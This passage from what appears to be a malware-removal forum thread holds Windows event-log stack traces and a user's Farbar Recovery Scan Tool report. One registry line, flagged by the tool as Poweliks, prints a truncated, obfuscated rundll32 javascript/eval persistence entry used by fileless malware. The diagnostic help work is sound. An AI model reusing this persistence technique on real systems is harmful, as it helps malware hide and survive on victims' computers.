   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (11/04/2014 09:47:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1639850338287unknown0.0.0.000000000c00000050372f8181e1001cff83e3010e543C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeunknown6ed653a1-6431-11e4-912c-3417eb9816d4

Error: (11/04/2014 09:47:00 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (11/04/2014 09:46:24 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.762_none_0c178a139ee2a7ed\MFC80.DLL

Error: (11/04/2014 09:46:24 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.762_none_0c178a139ee2a7ed\MFC80.DLL

Error: (11/04/2014 09:45:05 AM) (Source: Microsoft-Windows-WMI) (EventID: 10) (User: NT AUTHORITY)
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


==================== Memory info ===========================

Processor: Intel® Core™ i5-3470 CPU @ 3.20GHz
Percentage of memory in use: 30%
Total physical RAM: 8146.55 MB
Available physical RAM: 5659.4 MB
Total Pagefile: 16291.29 MB
Available Pagefile: 13618.86 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.88 GB) (Free:158.51 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive m: () (Network) (Total:557.75 GB) (Free:332.62 GB)
Drive p: () (Network) (Total:185.81 GB) (Free:66.09 GB)
Drive t: () (Network) (Total:185.81 GB) (Free:66.09 GB)
Drive u: () (Network) (Total:557.75 GB) (Free:332.62 GB)

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 352CB5C6)
Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================



BC AdBot (Login to Remove)

 


#2 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:11:41 PM

Posted 05 November 2014 - 08:10 AM

Hi,

 

You forgot to post the other log - FRST.txt. :)

 

 

Regards,

Georgi


cXfZ4wS.png


#3 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 05 November 2014 - 09:48 AM

Thank you so much Georgi!!

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by boylem1 (administrator) on BOYLEMP6 on 04-11-2014 11:26:57
Running from C:\Users\boylem1\Desktop
Loaded Profile: boylem1 (Available profiles: wilders & boylem1 & csadmin & PCAdmin)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Altiris, Inc.) C:\Program Files\Altiris\Dagent\dagent.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\ssonsvr.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
(Altiris, Inc.) C:\Program Files\Altiris\Dagent\dagentui.exe
(Cisco Systems, Inc) C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CiscoJabber.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NEC Corporation) C:\Users\boylem1\AppData\Local\NEC\UC700\NUvshost.exe
(NEC Corporation) C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\Receiver\Receiver.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\SelfServicePlugin\SelfServicePlugin.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe [2907240 2011-07-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [DagentUI] => C:\Program Files\Altiris\Dagent\dagentui.exe [852480 2013-11-22] (Altiris, Inc.)
HKLM\...\Run: [Cisco Jabber] => C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CiscoJabber.exe [86528 2014-08-07] (Cisco Systems, Inc)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [290688 2012-10-25] (Intel Corporation)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-11-29] (Intel Corporation)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [133440 2012-07-19] (Intel Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [395616 2014-09-03] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2014-09-03] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe [37232 2008-06-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe [640376 2008-06-11] (Adobe Systems Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%\System32\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-19809612-450918713-1538882281-8083\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-19809612-450918713-1538882281-8083\...\Run: [Nuvshot.exe] => C:\Users\boylem1\AppData\Local\NEC\UC700\Nuvshost.exe [24576 2013-01-15] (NEC Corporation)
HKU\S-1-5-21-19809612-450918713-1538882281-8083\...\Run: [UC700.exe] => C:\Users\boylem1\AppData\Local\NEC\UC700\UC700.exe [208384 2013-01-15] (NEC Corporation)
HKU\S-1-5-21-19809612-450918713-1538882281-8083\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: AMINIT64.DLL => C:\Windows\system32\AMINIT64.DLL [74576 2014-09-04] (Symantec Corporation)
AppInit_DLLs-x32: AMINIT32.DLL => "AMINIT32.DLL" File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Online plug-in.lnk
ShortcutTarget: Online plug-in.lnk -> C:\Windows\Installer\{913778D3-E1D8-4B55-9246-3308C54D3162}\pnaico.exe.20FBBF0A_A7E5_4BDE_9798_9811C3D135AC.exe ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x1DDE1C2791DDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKU\S-1-5-21-19809612-450918713-1538882281-8083\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli64.dll (Cisco WebEx LLC)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli64.dll (Cisco WebEx LLC)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T29L10NSP9EP2-10068/webex/ieatgpc1.cab
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} -  No File
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
